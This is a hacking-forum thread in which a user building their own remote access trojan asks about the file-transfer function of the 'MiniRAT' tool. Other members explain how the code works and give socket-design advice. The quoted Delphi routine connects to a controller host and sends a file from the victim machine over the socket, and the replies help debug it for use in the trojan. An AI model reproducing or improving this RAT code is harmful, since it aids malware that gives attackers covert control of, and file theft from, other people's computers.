Thread: MiniRAT 0.5b Filetransfer explaination plz?

I'm currently building a RAT of my own and got a lot of help från p0ke (his examples for winsock and MiniRAT).

But I've got a problem with the filetransfer. In miniRAT the code goes something like this:

The comments are mine, used to better describe the problem

Code:

Function SendFile(P: Pointer): DWord; STDCALL;
Var
  Sock          :TSocket;
  Addr          :TSockAddrIn;
  WSA           :TWSAData;

  BytesRead     :Cardinal;

  F             :File;
  Buf           :Array[0..8192] Of Char;
  dErr          :Integer;

  Name          :String;
  Host          :String;
  Port          :Integer;

  T             :String;
Begin
  Name := PInfo(P)^.Name;
  Host := PInfo(P)^.Host;
  Port := PInfo(P)^.Port;

  WSAStartUp($0101, WSA);
    Sock := Socket(AF_INET, SOCK_STREAM, 0);
    Addr.sin_family := AF_INET;
    Addr.sin_port := hTons(Port);
    Addr.sin_addr.S_addr := inet_Addr(pchar(Host));

    If (connect(Sock, Addr, SizeOf(Addr)) <> 0) Then Exit;

    {$I-}
    T := 'ok';
    AssignFile(F, Name);
    Reset(F, 1);
    Repeat
      BlockRead(F, Buf, SizeOf(Buf), BytesRead);  #Problem 1
      If (BytesRead = 0) Then Break;

      Send(Sock, Buf[0], SizeOf(Buf), 0);
      FillChar(Buf, SizeOf(Buf), 0);                      #Problem 2
      Recv(Sock, Buf, SizeOf(Buf), 0);                 #Problem 3
    Until BytesRead = 0;
    CloseFile(F);
    {$I+}

  WSACleanUp();
End;

#Problem 1:
I have no problem with this being done the first time but since it's repeated, I mean it's the same thing being done every time?

#Problem 2:
Why fill the buf with 0 when it's being sent?

#Problem 3:
Since the function sends a file, why should it revceive data? Is it to keep track of what has been sent?


Cheers to p0ke for this source <3

Edit:
I have read the Client-side and I can't get any sense even though I read this topic:
http://opensc.ws/showthread.php?t=1215

i presonally refuse to use spearate sockets for the same client (1 cmds & 1 for files) because you'll end up dossing urself

Second thing (if u really want to use 2 sockets) : you do not have to use any reads or things like this as winsock2 directly gives you a function which is very efficient (no kernel/user mode swaps etc)

look @ http://msdn2.microsoft.com/en-us/library/ms740565.aspx

@Probelm 1 : yes it looks just the same but the BlockRead Function internally pushes the file pointer forward so the whole file is sent

@Probem 2 : No idea - it could be explained that he always send the whole buffer (sizeof buffer ) - this buf maybe 5kb big but if just 1kb are left over to send/read the space behind 1kb still is filled with old sata so the file might be corrup. this is why u should ALWAYS USE A PROTOCOL - sending sequential data without any info can result in hours of debugging if errors occour
Or this line is only used for Problem 3 because old data might result in protocol errors while reading (strings to pChar conversations [#0] etc)

@Problem 3 : welll to check if the file should still be sent etc?? you can respond to aborts if you want to

Originally Posted by Trilithium

@Probelm 1 : yes it looks just the same but the BlockRead Function internally pushes the file pointer forward so the whole file is sent

@Probem 2 : No idea - it could be explained that he always send the whole buffer (sizeof buffer ) - this buf maybe 5kb big but if just 1kb are left over to send/read the space behind 1kb still is filled with old sata so the file might be corrup. this is why u should ALWAYS USE A PROTOCOL - sending sequential data without any info can result in hours of debugging if errors occour
Or this line is only used for Problem 3 because old data might result in protocol errors while reading (strings to pChar conversations [#0] etc)

@Problem 3 : welll to check if the file should still be sent etc?? you can respond to aborts if you want to

@1: So it sends data from the new pointer? I mean, if you have 3 parts it sends part one, then points at part 2 and so on?

@2: Since it sends data before the buf is zeroed it doesn't destroy anything?

@3: Isn't it better just to send an integer? 1 for continue sending and 0 for Break; ??

1 : nearly - in the end the "FILE" structure internally is a Windows-File-Handle
and also uses Readfile etc - delphi just gives you an "easy" interface to those win32 api funcs

so the pointer is an Offset off a file on disk - it will read one BLOCK at the time which size is determined by sizeof(buf) - if there is no more data,bytesread will be zero and the loop will exit

2 yes

3 depends - on a blocking socket the recv func waits until data(errors occour so if you do not respond (server) each time a packet has been send the loop will wait for ever ^^ so you might want to use a non blocming server

i hope this was right :cool: